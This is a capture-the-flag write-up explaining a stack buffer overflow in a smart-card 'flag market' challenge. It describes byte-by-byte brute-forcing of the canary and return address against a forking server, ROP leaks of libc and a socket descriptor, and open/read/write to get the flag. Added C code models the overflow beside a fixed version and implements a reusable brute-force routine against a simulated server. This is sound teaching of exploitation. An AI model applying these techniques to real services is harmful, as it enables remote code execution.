Buffer Overflow leads to RCE
Description:
Thank you for purchasing the last flag, they are currently sold out now!
Wait, what do you mean?
I...I definitely not hiding another flag...
Tag: pwn!
Solves: 0/584
In flag_market.c, the card_status() function (line 84) fails to pass atrBuf's size as the atrLen parameter. Thus we can forge an APDU that reads more than MAX_ATR_SIZE bytes into atrBuf and hijack control flow.
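The bug class in one place, as an added example that is not the challenge's own source (flag_market.c is not reproduced on the page): a toy card_status() whose copy bound comes from the APDU, beside one bounded by sizeof(atrBuf). The frame layout, the MAX_ATR_SIZE value, the function names and the clobbered_fields() driver are assumptions for illustration. The point it makes is that once the bound is client-controlled, the same APDU that fills atrBuf also rewrites the canary, saved rbp and return address above it, which is what the rest of the writeup relies on.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_ATR_SIZE 33   /* ISO 7816-3 maximum ATR length; the challenge's value is not shown */

/* Toy model of the stack frame card_status() would have: atrBuf sits below the
 * canary, saved rbp and return address, which is why an oversized copy reaches
 * them. Padding and offsets are assumptions for illustration. */
struct frame {
    uint8_t  atrBuf[MAX_ATR_SIZE];
    uint8_t  pad[7];
    uint64_t canary;
    uint64_t saved_rbp;
    uint64_t ret;
};

/* Copies min(apdu_len, atrLen) ATR bytes; safe only if atrLen is the buffer size. */
static size_t copy_atr(uint8_t *atrBuf, size_t atrLen,
                       const uint8_t *apdu, size_t apdu_len) {
    size_t n = apdu_len < atrLen ? apdu_len : atrLen;
    memcpy(atrBuf, apdu, n);
    return n;
}

/* Buggy shape: atrLen is the length the client put in the APDU, not
 * sizeof(atrBuf), so the client decides how far past the buffer the copy goes.
 * atrBuf is the first member, so (uint8_t *)f is the same address as f->atrBuf. */
size_t card_status_vuln(struct frame *f, const uint8_t *apdu, size_t apdu_len) {
    return copy_atr((uint8_t *)f, apdu_len, apdu, apdu_len);
}

/* Hardened shape: the bound is the buffer size and an oversized ATR is rejected. */
size_t card_status_fixed(struct frame *f, const uint8_t *apdu, size_t apdu_len) {
    if (apdu_len > sizeof f->atrBuf) return 0;   /* caller treats 0 as a protocol error */
    return copy_atr(f->atrBuf, sizeof f->atrBuf, apdu, apdu_len);
}

#define CANARY_ORIG 0x1122334455667700ULL   /* made-up values with a glibc-style 0 low byte */
#define RBP_ORIG    0x00007ffd12345670ULL
#define RET_ORIG    0x0000563300401234ULL

/* Sends a constructed APDU of apdu_len filler bytes and reports which saved
 * values were clobbered: bit 0 canary, bit 1 saved rbp, bit 2 return address. */
int clobbered_fields(int fixed, size_t apdu_len) {
    struct frame f;
    uint8_t apdu[sizeof(struct frame)];
    memset(&f, 0, sizeof f);
    f.canary = CANARY_ORIG;
    f.saved_rbp = RBP_ORIG;
    f.ret = RET_ORIG;
    memset(apdu, 'A', sizeof apdu);
    if (apdu_len > sizeof apdu) apdu_len = sizeof apdu;
    if (fixed) card_status_fixed(&f, apdu, apdu_len);
    else       card_status_vuln(&f, apdu, apdu_len);
    return (f.canary != CANARY_ORIG)
         | ((f.saved_rbp != RBP_ORIG) << 1)
         | ((f.ret != RET_ORIG) << 2);
}
```

With this layout, 40 bytes stay inside the buffer and padding, byte 41 already changes the canary's low byte, and 64 bytes reach the return address; the fixed version never copies more than 33.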
Note that the server forks a new process for each connection, so every child shares the parent's canary and memory layout and a wrong guess only crashes that child; all the information can therefore be leaked byte by byte over many connections.
- Canary
  - Brute-force each byte (at most 8 * 256 attempts)
  - Success: received 200 OK
  - Failed: received 500 Internal Server Error
- Code address
  - With the canary known, we can overwrite the saved RIP byte by byte to point at the cleanup() function (line 36)
  - Brute-force each byte (at most 4 * 256 + 16 attempts)
  - Success: received 500 Internal Server Error
  - Failed: no reply, so set a timeout
- Libc address
  - With the code address, we can build a ROP chain to leak a libc address from the GOT
  - There is a self-referencing pointer in BSS (code + 0x5008); we can modify this value with the add [rbp-0x3d], ebx gadget and jump to code + 0x1560, which sends the value at [code+0x5008] to the socket fd
- Current connection socket fd
  - Use the libc address to build a ROP chain and leak connection_sock from BSS
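The two brute-force leaks above (the canary, then the saved RIP) as one added example in C; this is not the author's exploit. A generic byte-at-a-time routine is driven by an oracle callback and run against a constructed stand-in for the forking server: canary_oracle models the 200/500 split, rip_oracle the 500/timeout split, and the server struct, canary value, PIE base and cleanup() offset are made up. The low_nibble argument reproduces the "+16" in the writeup's count: the binary is page-aligned, so byte 0 of cleanup() and the low nibble of byte 1 are known from the file and only byte 1's high nibble needs 16 tries. One caveat the 8 * 256 bound leaves implicit: glibc's canary always has 0x00 as its lowest byte, so that byte costs one query (or none, if skipped).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* What one forked child's connection can be observed to do. */
enum resp { RESP_200, RESP_500, RESP_TIMEOUT };

/* An oracle receives the bytes written past the buffer so far and reports the outcome. */
typedef enum resp (*oracle_fn)(const uint8_t *guess, size_t n, void *ctx);

/* Byte-at-a-time recovery of an nbytes secret. out[0..known) are already correct;
 * low_nibble (0..15, or -1) restricts the candidates for the first unknown byte.
 * Returns the number of oracle queries, or -1 if some byte had no accepted value.
 * Sound only because every connection is a fork() of one parent: the secret is
 * identical in every child and a wrong guess only kills that child. */
long brute_force_bytes(oracle_fn oracle, void *ctx, enum resp good,
                       uint8_t *out, size_t nbytes, size_t known, int low_nibble) {
    long queries = 0;
    for (size_t i = known; i < nbytes; i++) {
        int found = 0;
        for (int b = 0; b < 256 && !found; b++) {
            if (i == known && low_nibble >= 0 && (b & 0xf) != low_nibble) continue;
            out[i] = (uint8_t)b;
            queries++;
            found = (oracle(out, i + 1, ctx) == good);
        }
        if (!found) return -1;
    }
    return queries;
}

/* ---- Constructed stand-in for the forking server; not the challenge binary. ---- */
#define PIE_BASE    0x5633d4a79000ULL   /* made-up load address */
#define CLEANUP_OFF 0x13c0ULL           /* made-up file offset of cleanup() */

struct server { uint8_t canary[8]; uint64_t saved_rip; uint64_t cleanup; };

static const struct server DEMO = {
    { 0x00, 0x3a, 0x91, 0xc4, 0x17, 0x88, 0xde, 0x5b },  /* glibc-style: low byte is 0 */
    PIE_BASE + 0x13f8,                                   /* where card_status() returns */
    PIE_BASE + CLEANUP_OFF,
};

/* Canary step: a child whose canary prefix is intact finishes and answers 200;
 * one that fails the check dies and the client sees 500. */
static enum resp canary_oracle(const uint8_t *guess, size_t n, void *ctx) {
    const struct server *s = ctx;
    return memcmp(guess, s->canary, n) == 0 ? RESP_200 : RESP_500;
}

/* RIP step: the low n bytes of the saved return address are replaced and the rest
 * keep their original value. Only landing exactly on cleanup() yields a 500; any
 * other address crashes or hangs the child, which the client sees as a timeout. */
static enum resp rip_oracle(const uint8_t *guess, size_t n, void *ctx) {
    const struct server *s = ctx;
    uint8_t rip[8];
    uint64_t v;
    memcpy(rip, &s->saved_rip, 8);   /* little-endian: rip[0] is the low byte */
    memcpy(rip, guess, n);
    memcpy(&v, rip, 8);
    return v == s->cleanup ? RESP_500 : RESP_TIMEOUT;
}

/* Leak the canary. With skip_null_byte the known 0x00 low byte is not queried. */
long demo_canary_queries(int skip_null_byte) {
    uint8_t canary[8] = {0};
    long q = brute_force_bytes(canary_oracle, (void *)&DEMO, RESP_200,
                               canary, 8, skip_null_byte ? 1 : 0, -1);
    return memcmp(canary, DEMO.canary, 8) == 0 ? q : -1;
}

/* Leak the code address: byte 0 and the low nibble of byte 1 of cleanup() come
 * from the binary (page-aligned PIE) and bytes 6..7 of a user-space address are 0,
 * so only byte 1's high nibble and bytes 2..5 are brute-forced (16 + 4 * 256 max). */
static long leak_rip(uint8_t rip[8]) {
    memset(rip, 0, 8);
    rip[0] = (uint8_t)(CLEANUP_OFF & 0xff);
    return brute_force_bytes(rip_oracle, (void *)&DEMO, RESP_500,
                             rip, 6, 1, (int)((CLEANUP_OFF >> 8) & 0xf));
}

long demo_rip_queries(void) { uint8_t rip[8]; return leak_rip(rip); }

/* The recovered return address is cleanup() itself, so subtracting its file
 * offset gives the PIE base needed for the ROP chain. */
uint64_t demo_pie_base(void) {
    uint8_t rip[8];
    uint64_t v;
    if (leak_rip(rip) < 0) return 0;
    memcpy(&v, rip, 8);
    return v - CLEANUP_OFF;
}
```

Against a real server each oracle call is one fresh TCP connection carrying the canary bytes found so far plus the guess, and the 500/timeout distinction for the RIP step is why the writeup needs a socket timeout rather than an HTTP status on failure.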
Finally, you can perform orw (open/read/write) to get the flag. My exploit took about 20 minutes to run :(
- https://piers-n.github.io/post/balsn-ctf-2022-writeup/
  - Very detailed writeup with a different leak method